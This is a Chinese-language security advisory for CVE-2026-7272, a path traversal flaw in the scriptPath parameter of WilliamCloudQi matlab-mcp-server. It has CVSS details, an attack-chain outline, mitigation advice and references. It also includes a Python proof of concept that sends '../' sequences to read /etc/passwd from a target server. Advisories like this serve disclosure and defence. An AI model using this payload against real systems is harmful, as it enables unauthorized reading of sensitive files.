CVE-2026-7272 matlab-mcp-server路径遍历漏洞

漏洞信息

漏洞编号

CVE-2026-7272

漏洞类型

路径遍历

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WilliamCloudQi matlab-mcp-server

漏洞概述

WilliamCloudQi matlab-mcp-server在版本ab88f6b9bf5f36f725e8628029f7f6dd0d9913ca及之前存在路径遍历漏洞。该漏洞位于MCP接口组件的src/index.ts文件中，具体影响generate_matlab_code和execute_matlab_code函数。由于未正确过滤用户输入的scriptPath参数，攻击者可以通过精心构造的参数读取系统任意文件。攻击者无需用户交互且无需认证即可远程利用此漏洞，目前已有公开的漏洞利用代码，且官方尚未回应修复请求，风险较高。

技术细节

该漏洞的核心在于WilliamCloudQi matlab-mcp-server未能对传入的`scriptPath`参数进行严格的校验和净化。在受影响的版本中，`src/index.ts`文件内的`generate_matlab_code`或`execute_matlab_code`函数直接使用了该参数来构建文件路径。攻击者可以利用路径遍历序列（如“../”）跳出预期的目录限制，访问服务器上的任意文件系统位置。由于CVSS向量显示攻击复杂度低（AC:L）、无需权限（PR:N）且无需用户交互（UI:N），这意味着攻击者可以轻易地通过网络发起攻击。利用该漏洞可能导致敏感信息泄露（机密性影响）、文件被篡改（完整性影响）或服务中断（可用性影响）。鉴于漏洞细节已被公开且供应商尚未发布修复补丁，该组件面临极高的被利用风险。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在运行易受攻击的WilliamCloudQi matlab-mcp-server版本。

STEP 2

武器化

攻击者构造包含路径遍历字符（如“../”）的恶意`scriptPath`参数，旨在访问系统敏感文件（如/etc/passwd）。

STEP 3

交付

攻击者向受影响组件的`generate_matlab_code`或`execute_matlab_code`接口发送特制的HTTP请求。

STEP 4

利用

服务器端应用未对参数进行过滤，直接处理路径遍历请求，导致攻击者读取到预期目录之外的文件内容。

STEP 5

影响

攻击者成功获取敏感信息，可能导致进一步的系统入侵或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# Target URL configuration
# The vulnerability affects the execute_matlab_code or generate_matlab_code endpoints
target_url = "http://localhost:3000/execute" # Replace with actual target URL

# Constructing the malicious payload
# Using '../' sequence to traverse out of the expected directory
payload = {
    "scriptPath": "../../../../../../etc/passwd", # Path traversal payload
    "method": "execute_matlab_code"
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)

    # Checking if the attack was successful
    if response.status_code == 200:
        print("[+] Exploit successful! Server responded:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)

except Exception as e:
    print(f"[!] An error occurred: {e}")

影响范围

WilliamCloudQi matlab-mcp-server <= ab88f6b9bf5f36f725e8628029f7f6dd0d9913ca

防御指南

临时缓解措施

建议立即检查并限制对该服务的网络访问，仅允许可信IP连接。在官方发布修复版本前，开发者应在代码中对scriptPath参数实施严格的白名单校验，禁止包含“../”等特殊字符的输入，并使用路径解析函数（如Node.js的path.resolve结合白名单检查）确保最终路径位于预期目录内。若非必要，建议暂时停止使用该受影响组件。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-7272
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-7272
3 Details https://www.cvedetails.com/cve/CVE-2026-7272/
4 VulDB https://vuldb.com/cve/CVE-2026-7272
5 Link https://github.com/BruceJqs/public_exp/issues/18
6 Link https://github.com/WilliamCloudQi/matlab-mcp-server/
7 Link https://github.com/WilliamCloudQi/matlab-mcp-server/issues/8
8 Link https://vuldb.com/submit/802911
9 Link https://vuldb.com/vuln/359927
10 Link https://vuldb.com/vuln/359927/cti